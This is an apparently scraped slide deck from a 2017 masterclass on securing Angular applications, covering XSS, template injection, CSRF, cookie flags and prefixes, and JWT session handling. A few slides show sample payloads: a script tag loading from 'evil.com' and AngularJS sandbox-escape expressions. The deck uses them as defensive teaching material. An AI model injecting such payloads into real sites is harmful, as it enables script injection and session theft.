![Page 1: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/1.jpg)
@PhilippeDeRyck
SECURE YOUR CODEPhilippeDeRyckMasterclassScaleUp Porto,May2017
https://www.websec.be
![Page 2: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/2.jpg)
@PhilippeDeRyck
ANGULAR APPLICATIONS RUN WITHIN THE BROWSER
JScode
HTMLcode
Data
Loadapplication
JScode/HTMLcode
JScode
HTMLcode
JSApplicationHTMLTemplate
FetchdatafromAPI
Rawdata
2
![Page 3: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/3.jpg)
@PhilippeDeRyck
ABOUT ME – PHILIPPE DE RYCK
§Mygoalistohelpyoubuildsecurewebapplications−Hostedandcustomizedin-housetraining− Specializedsecurityassessmentsofcriticalsystems− Threatlandscapeanalysisandprioritizationofsecurityefforts−Moreinformationandresourcesonhttps://www.websec.be
§ Ihaveabroadsecurityexpertise,withafocusonWebSecurity−PhDinclient-sidewebsecurity−MainauthorofthePrimeronclient-sidewebsecurity
§ PartoftheorganizingcommitteeofSecAppDev.org−Week-longcoursefocusedonsecurityfordevelopers
3
![Page 4: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/4.jpg)
@PhilippeDeRyck
CROSS-SITE SCRIPTING (XSS)
4
![Page 5: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/5.jpg)
@PhilippeDeRyck
XSSREFRESHER
https://websec.be/?username=Philippe
<p>Welcome <b><?php echo $username ?></b></p>
<p>Welcome <b>Philippe</b></p>
https://websec.be/?username=<blink>dude</blink>
https://websec.be/?username=pwned<script src=“//evil.com/hook.js”></script>
<p>Welcome <b><blink>dude</blink></b></p>
<p>Welcome <b>pwned<script src=“//evil.com/hook.js”></script></b></p>
WelcomePhilippe
Welcome ng-be
Welcomepwned
dude
![Page 6: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/6.jpg)
@PhilippeDeRyck
SERVER-SIDE DEFENSES AGAINST XSS
<p>Welcome <b><?php echo htmlentities($username) ?></b>
</p>
<p>Welcome <b><?php echo $username ?></b>
</p>
<script>var username = “<?php echo $username ?>”;
</script><p class=“<?php echo $status ?>”>
Welcome <b style=“color: <?php echo $color?>”><?php echo $username ?></b></p>
<p>Welcome <b><blink>dude</blink></b>
</p>
![Page 7: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/7.jpg)
@PhilippeDeRyck
ANGULAR MAKES IT A LOT LESS PAINFUL
<p>Welcome <b>{{username}}</b></p>
https://websec.be/?username=<blink>dude</blink>
<p>Welcome <b><blink>dude</blink></b></p> Welcome<blink>dude</blink>
https://websec.be/?username=<script>alert(‘no!’)</script>
<p>Welcome <b><bscript>alert(’no!’)</script></b></p>
Welcome<script>alert(‘no!’)</script>
![Page 8: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/8.jpg)
@PhilippeDeRyck
EVEN WHEN YOU ACTUALLY NEED SANITIZATION
<p>Welcome <b [innerHTML]=“htmlSnippet”></b></p>
htmlSnippet=“<blink>dude</blink>”
<p>Welcome <b><blink>dude</blink></b></p>
htmlSnippet=pwned<script src=“//evil.com/hook.js”></script>
<p>Welcome <b>pwned</b></p> Welcomepwned
Welcome ng-bedude
![Page 9: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/9.jpg)
@PhilippeDeRyck
RESPECT THE AUTHORITY OF THE SANITIZER
§ SanitizationisenabledbydefaultwhenyoubindHTMLintotheDOM− Themajorityofyouwillnotevennoticethesanitizeratwork,whichisgreat!−MakesureyoudothisviaAngular,notbydirectlycallingtheDOMAPI
§ Thereisawaytobypasssanitization,butitshouldbeusedwithcare−Onlyintendedtomarkstaticsnippetsofcodeassafe,hencethename
TrustHtml()TrustScript()TrustStyle()TrustUrl()TrustResourceUrl()
bypassSecuritybypassSecuritybypassSecuritybypassSecuritybypassSecurity
![Page 10: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/10.jpg)
@PhilippeDeRyck
TAKEAWAY #1
ANGULAR ALREADY PROTECTS YOU AGAINST XSS,JUST GET OUT OF THE WAY
§ Angulardoesaprettygoodjobprotectionyoufrominjectionattacks− SimpledatabindingsareautomaticallyescapedbyAngular−Databindingsthatcanresultincodeinjectionareautomaticallysanitized
§ Yourjobistostayoutoftheway,andletAngulardoitsjob−Donotinjectuntrustedcodeintoserver-sidetemplates−DonotdirectlyuseDOMAPIstobindthisdata,butusebuilt-inmechanisms−Onlyusethisforstaticdata,whichhasbeenverifiedtobesecure
§ Complementarytothis,youcandeployContentSecurityPolicy−Allowsyoutolockdownthepoweroftheattacker,incaseanattackhappens
![Page 11: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/11.jpg)
@PhilippeDeRyck
TRICKING ANGULAR INTO MISBEHAVING
<script src=“…/angular.js”></script><p>Welcome <b><?php echo htmlentities($username) ?></b></p>
https://websec.be/?username=Philippe{{constructor.constructor(‘alert(1)’)}}
<p>Welcome <b>Philippe{{constructor.constructor(‘alert(1)’)}} </b></p>
WelcomePhilippe
![Page 12: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/12.jpg)
@PhilippeDeRyck
TRICKING ANGULAR INTO MISBEHAVING
https://websec.be/orderBy.html#field=name
https://blogs.synopsys.com/software-integrity/2016/12/28/angularjs-1-6-0-sandbox/
https://websec.be/orderBy.html#field={{constructor.constructor(‘alert(…)’)}}
![Page 13: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/13.jpg)
@PhilippeDeRyck
VARIOUS WAYS TO CONTROL TEMPLATES IN ANGULAR 1
https://docs.angularjs.org/guide/security
![Page 14: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/14.jpg)
@PhilippeDeRyck
THERE’S NO SAFE WAY TO DO THIS WITH ANGULAR 1…
http://angularjs.blogspot.be/2016/09/angular-16-expression-sandbox-removal.html
![Page 15: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/15.jpg)
@PhilippeDeRyck
BUT ANGULAR 2OFFERS AHEAD-OF-TIME COMPILATION
§ Theofflinecompilerturnstheapplicationintoexecutablecode− Thecompilerisnotevenavailableanymoreinthebrowser−Databindingsarealreadyresolved,andencodedintotheJSbundle
§ AOTcompilationeffectivelystopstemplateinjectionattacks−Atthemomentofinjection,theapplicationisalreadycompiled− Theinjectedtemplatecodewillsimplyberendered,notexecuted
var currVal_6 = __WEBPACK_IMPORTED_MODULE_2__angular_core_src_linker_view_utils__["inlineInterpolate"](1, '\n ', this.context.MyAOTBinding, '\n');
![Page 16: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/16.jpg)
@PhilippeDeRyck
TAKEAWAY #2
NEVER PASS UNTRUSTED DATA TO THE COMPILER
§ CombiningAngularwithothertechnologiescanresultintemplateinjection−Dynamicallygeneratedserver-sidepages(PHP,JSP,…)−Client-sidelibrariesthatrunbeforeAngulardoes(Jquery,...)
§ ThisisactuallyabigprobleminAngular1.xapplications− Theexpressionsandboxtriedtofixthis,butitturnedouttobetoohardtogetright−Neverfeeduntrusteddatatothecompiler
§ Angular2’sAOTallowsyoutocompileyourtemplatesdirectlyintotheJSfiles−Removesclient-sideprocessingoftemplates,thusremovesinjectionattacks−Additionalincentive:AOTgivesyouamassiveperformanceimprovement
![Page 17: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/17.jpg)
@PhilippeDeRyck
“COOKIES VS TOKENS”
17
https://www.quora.com/How-can-I-use-session-management-if-I-am-using-AngularJS-in-client-side-and-web-API-to-supply-data-to-it-What-is-the-architecture-to-build-a-complete-application-when-I-am-using-the-new-client-side-frameworks-to-build-a-web-app
![Page 18: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/18.jpg)
@PhilippeDeRyck
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Injection
BrokenAuthenticationandSessionManagement
Cross-SiteScripting(XSS)
InsecureDirectObjectReferences
SecurityMisconfiguration
SensitiveDataExposure
MissingFunctionLevelAccessControl
Cross-SiteRequestForgery
UsingComponentswithKnownVulnerabilities
Unvalidated RedirectsandForwards
1
2
3
4
5
6
7
8
9
10
Injection
BrokenAuthenticationandSessionManagement
Cross-SiteScripting(XSS)
BrokenAccessControl
SecurityMisconfiguration
SensitiveDataExposure
InsufficientAttackProtection
Cross-SiteRequestForgery
UsingComponentswithKnownVulnerabilities
Underprotected APIs
1
2
3
4
5
6
7
8
9
10
![Page 19: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/19.jpg)
@PhilippeDeRyck
SESSION MANAGEMENT IN THREE PROPERTIES
§ Transportmechanism−Howisthesessiondatabeingsentbetweentheclientandserver?− TwocommonapproachesherearecookiesandtheAuthorization header
§ Locality− Isthesessiondatabeingstoredontheserverorontheclient?− ThelatterismorecommoninAngularapplications,butmoretrickythanitseems
§ Representation− Inwhichformatisthesessiondatathatistransmittedrepresented?− Thisusedtobeasessionidentifier,buttoday,wehaveJWTandcustomformats
![Page 20: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/20.jpg)
@PhilippeDeRyck
![Page 21: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/21.jpg)
@PhilippeDeRyck
COOKIE FLAGS PATCH COOKIE BEHAVIOR
§ ThebehaviorofcookiesisincompatiblewiththeSameOriginPolicy− Cookiesareassociatedwithahost,notanentireorigin− Cookiescanbesetforanentiredomain− CookiescanbeaccessedfromJavaScript
§ Thisbehaviorcanbeslightlypatchedwithcookieflags− CookiescanbemarkedasSecure,sothattheywillonlybeusedonHTTPSconnections− CookiescanbemarkedashttpOnly,sothattheywillnotbeaccessiblefromJavaScript
§ Thesediscrepanciesallowtargetedattacksagainstspecificcookies− OverwritingofsecureorhttpOnly cookies− Cookiejaroverflowattackstopushoutcookiesfromthestore− …
Set-Cookie: SSID=1234; Secure; HttpOnlyCookie: SSID=1234
21
![Page 22: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/22.jpg)
@PhilippeDeRyck
COOKIE PREFIXES TAKE IT A STEP FURTHER
§ Therecentlyproposedcookie-prefixspectriestorestrictcookiebehavior− Cookienamescanbeprefixedwithanattribute,enforcingstrictbehavior
§ The__Secure- prefixrestrictsacookietosecureconnectionsonly− Itcannotbesetoveraninsecureconnection− ItcannotbesetiftheSecure flagismissing
§ The__Host- prefixrestrictsacookietoaspecifichost− Itwillonlybesenttoahost,nevertoadomain− Itmustbesetfortherootpath(/)andwiththesamepropertiesasthe__Secure- prefix
§ Enforcementdependsonbrowserbehavior− Currentlysupportedinallmodernbrowsers(Chrome,Firefox,Opera,Edge,Safari)
22
https://tools.ietf.org/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2
![Page 23: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/23.jpg)
@PhilippeDeRyck
THE UNDERESTIMATED THREAT OF CSRF
websec.be
anysite.io
loginasPhilippeWelcomepage
Showmessages
Latestmessages
Showobligatorycatpics
Kittensfromhell
23
![Page 24: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/24.jpg)
@PhilippeDeRyck
THE ESSENCE OF CSRF
§ CSRFexistsbecausethebrowserhandlescookiesveryliberally− Theyareautomaticallyattachedtoanyoutgoingrequest−Bydefault,there’snomechanismtoindicatetheintentofarequest
§Manyapplicationsareunawarethatanycontextcansendrequests− Thesessioncookieswillbeattachedautomaticallybythebrowser−DefendingagainstCSRFrequiresexplicitactionbythedeveloper
§ Becauseofitssubtlenature,CSRFisacommonvulnerability− IllustratedbycasesatGoogle,Facebook,eBay,…−Ranked#8onOWASPtop10(2013)
24
![Page 25: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/25.jpg)
@PhilippeDeRyck
TAKING CONTROL OF YOUR HOME NETWORK WITH CSRF
http://arstechnica.com/security/2014/03/hackers-hijack-300000-plus-wireless-routers-make-malicious-changes/https://threatpost.com/pharming-attack-targets-home-router-dns-settings/111326
25
![Page 26: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/26.jpg)
@PhilippeDeRyck
TRADITIONAL CSRFDEFENSE WITH HIDDEN FORM TOKENSwebsec.be
anysite.io
loginasPhilippeWelcomepage
Postmessage
Surething,Philippe
Showobligatorycatpics
Kittensfromhell
<input type=“hidden” name=“csrftoken” value”1234abc” />
26
![Page 27: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/27.jpg)
@PhilippeDeRyck
DEFENDING AGAINST CSRFATTACKS
§ CSRFexistsbecausetheserverdoesnotrealizerequestscanbeunintentional−HTMLelementsonanypagecantriggeraseeminglylegitimaterequest−Defensesarelikelytobeabsent,unlessyouexplicitlyknowaboutthisproblem−Onlyveryfewframeworksofferout-of-the-boxprotectionagainstCSRF
§ Commondefensestrategyistouseahiddentoken− Thetokenisembeddedintheformbytheserver,andsubmittedasahiddenfield−OthercontextswillnotbeabletoaccessthetokenbecauseoftheSOP
§HiddenformtokensarenotveryAngular-esque−HowdoyouevendealwithhiddentokensinaJSONAPI?
27
![Page 28: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/28.jpg)
@PhilippeDeRyck
TRANSPARENT TOKENS AGAINST CSRFATTACKSwebsec.be
anysite.io
loginasPhilippeWelcome,Philippe
Postmessage
Surething,Philippe
Showobligatorycatpics
Kittensfromhell
POST …Cookie: SID=123, XSRF-TOKEN=abcX-XSRF-TOKEN: abc
CookievalueiscopiedtoaheaderbyJavaScriptcode
28
![Page 29: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/29.jpg)
@PhilippeDeRyck
ANGULARJSSUPPORTS TRANSPARENT TOKENS BY DEFAULT
29
https://docs.angularjs.org/api/ng/service/$httphttps://angular.io/docs/ts/latest/guide/security.html
![Page 30: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/30.jpg)
@PhilippeDeRyck
ALTERNATIVE CSRFDEFENSE:SAMESITE COOKIESwebsec.be
anysite.io
loginasPhilippeWelcomepage
Postmessage
Surething,Philippe
Showobligatorycatpics
Kittensfromhell
Set-Cookie: SSID=1234; SameSite=Strict
https://tools.ietf.org/html/draft-west-first-party-cookies-07
30
![Page 31: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/31.jpg)
@PhilippeDeRyck
THE SAMESITE COOKIE ATTRIBUTE
§ TheSameSite attributeactuallysupportsastrict andlaxmode− Instrictmode,thebrowserwillneverattachthecookietoacross-siterequest
• Thisisdeterminedbasedontheregistereddomain,nottheorigin
− Inlaxmode,thecookiewillbepresentonsafetop-levelnavigations• e.g.aGETrequestthatresultsinanavigationofthecontext
§ ThedefaultsettingfortheSameSite attributeisstrictmode− ThisisthemodeyougetwhenyousimplyaddSameSite tothecookie− ThiswillstopallCSRFattacks
§ AddingtheSameSite attributeinlaxmodewillstopmostCSRFattacks−UnlesstheattackcanbelaunchedwithaGETrequest
31
![Page 32: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/32.jpg)
@PhilippeDeRyck
BROWSER SUPPORT FOR SAMESITE COOKIES
http://caniuse.com/#search=samesite
32
![Page 33: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/33.jpg)
@PhilippeDeRyck
CSRFIN AN APIWORLD
§HTTPrequestsgeneratedfromHTMLelementsareveryconstrained− Theycannotgeneraterequestswitharbitrarycontenttypes− Theycannotsetcustomrequestheaders
§ TraditionalCSRFisnotaproblemforAPIsthatrejectsuchHTTPrequests−HTMLelementscannotgeneratevalidHTTPrequeststoyourbackend−XHRgivesyoumorefreedom,butthenCross-OriginResourceSharingcomesintoplay
§ TheCORSspecisdesignedtopreventadditionalCSRFattackvectors−XHRrequeststhatmimicthepossibilitiesfromHTMLelementscantriggerCSRF
• ButyourAPIrejectsthemanyway−MorecomplexXHRrequestsrequireapprovalbytheserverfirst
• IfyouenableCORS,thenyoucanchecktheOriginheadertoseewheretherequestcomesfrom
33
![Page 34: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/34.jpg)
@PhilippeDeRyck
WHEN CORSCOMES INTO PLAY,CHECK THE ORIGIN HEADER
websec.be
anysite.io
Postmessage
Surething,Philippe
Showobligatorycatpics
Kittensfromhell
Origin: https://websec.be
34
![Page 35: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/35.jpg)
@PhilippeDeRyck
THE AUTHORIZATION HEADER AS AN ALTERNATIVE TO COOKIES
35
![Page 36: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/36.jpg)
@PhilippeDeRyck
THE RESURRECTION OF THE AUTHORIZATION HEADER
§ TheAuthorizationheaderhasbecomepopularagaininthelastfewyears−OftenusedtosendaccesstokensinanOAuth2.0flow− It’saheader,soyoucaneasilyuseittostoretransmitsessiondataaswell− Theheaderiswellknown,sounlikelytobestrippedbyproxiesandmiddleboxes
§ Thebrowserdoesnothandletheheaderautomatically− TheapplicationwillneedtodoitsownsessionmanagementfromJavaScript− Thesessiondatawillhavetobestoredbytheapplicationaswell−Well-supportedbynumerousframeworksandlibraries
Authorization: Bearer eyJ2aWV3cyI6MTR9
36
![Page 37: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/37.jpg)
@PhilippeDeRyck
ADDING THE AUTHORIZATION HEADER IN ANGULARJS
https://www.toptal.com/web/cookie-free-authentication-with-json-web-tokens-an-example-in-laravel-and-angularjs
Carefulwhereyousendyoursessioninformationto!
![Page 38: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/38.jpg)
@PhilippeDeRyck
STORING SESSION DATA IN THE BROWSER
38
In-memory
Doesnotsurviveapagereload
Canbeshieldedfrommaliciouscode
Survivesapagereload
Canbesomewhat shieldedfrommaliciouscode
Survivesapagereload
Cannotbeshieldedfrommaliciouscode
Availabletorunningcodeonly
Availabletotheentiretab Availabletotheentireorigin
SessionStorage LocalStorage
![Page 39: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/39.jpg)
@PhilippeDeRyck
THE AUTHORIZATION HEADER VS COOKIES
39
Cookies Authorizationheader
IsalmostalwaysanenablerofCSRF EnablingCSRFwiththeAuthorizationheaderrequiresseriousprogrammingerrors
CanbehiddenfrommaliciousJavaScript AvailabilitytoJavaScriptdependsonthestoragemechanism
Cancontainanykindofdata Cancontainanykindofdata
Isattachedautomatically,toallrequests Isnotpresentonbrowser-generatedrequests
Arealwaysassociatedwithonedomain Isunderyourcontrol,andcanbeattachedtoanyrequest
![Page 40: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/40.jpg)
@PhilippeDeRyck
TAKEAWAY #3
THE TRANSPORT MECHANISM FOR SESSION DATA HAS A BIG IMPACT
§ Thequestion“cookiesvstokens”doesnotreallymakesense−Cookiescombinetransportwithstorage,butcancontainanykindofdata− Tokenscanbejustaboutanything−Bothmechanismssupportserver-sideandclient-sidesessionmanagement
§ Cookiesarewell-supportedbybrowsers,buthavetheirquirks− Enabletheappropriateflagsandprefixestopatchbrowserbehavior−BeawareofCSRFattacksagainstyourbackend
• ThisdoesnotapplyifyouhaveaCORS-protectedAPI
§ Client-sidesessionswithtokensareoftenconsideredmandatoryinAngular−Movingtowardstokensrequirescustomsessionmanagement,whichishard− Incompatiblewithmanyscenariosontheweb(CORS,DOM-basedrequests,…)
![Page 41: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/41.jpg)
@PhilippeDeRyck 41http://jwt.io/
![Page 42: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/42.jpg)
@PhilippeDeRyck
AJWTIS A BASE64-ENCODED DATA OBJECT
{"alg": "HS256","typ": "JWT"
}
{"iss": ”distrinet.cs
.kuleuven.be","exp": 1425078000000,"name": "philippe","admin": true
}
HMACSHA256(base64UrlEncode(header)+ "." +base64UrlEncode(payload),“secret”
)
Header Payload Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaXN0cmluZXQuY3Mua3VsZXV2ZW4uYmUiLCJleHAiOjI0MjUwNzgwMDAwMDAsIm5hbWUiOiJwaGlsaXBwZSIsImFkbWluIjp0c
nVlfQ.dIi1OguZ7K3ADFnPOsmX2nEpF2Asq89g7GTuyQuN3so
42
![Page 43: DeRyck ScaleUpPorto AngularSessionManagement€¦ · @PhilippeDeRyck ABOUTME–PHILIPPEDERYCK §My goal is to help you build secure web applications −Hosted and customized in-house](https://reader035.vdocument.in/reader035/viewer/2022081404/5f04b2577e708231d40f40b9/html5/thumbnails/43.jpg)
@PhilippeDeRyck
USING JWTS IN PRACTICE
§ JWTtokensareawaytorepresentclaimsbetweenparties−Commonuseistorepresentsessiondataandstoreitontheclient− Inthedefaultscenario,JWTsaresignedusinganHMACwithaserver-sidesecret− Thesignaturecanbeusedtoensuretheintegrityofthetokenonthenextrequest
§GeneratingandverifyingJWTtokensisabackendresponsibility− Thesignatureisbasedontheclaimsinthetoken− Intheory,theclientcoulddecodetheJWTandextractinformationabouttheclaims− Inpractice,itiscleanertoprovidethisinformationseparately
§ Client-sideapplicationneedstoensurethattheJWTispresentonrequests− Thiscanbeinacookie,orintheAuthorization header
43
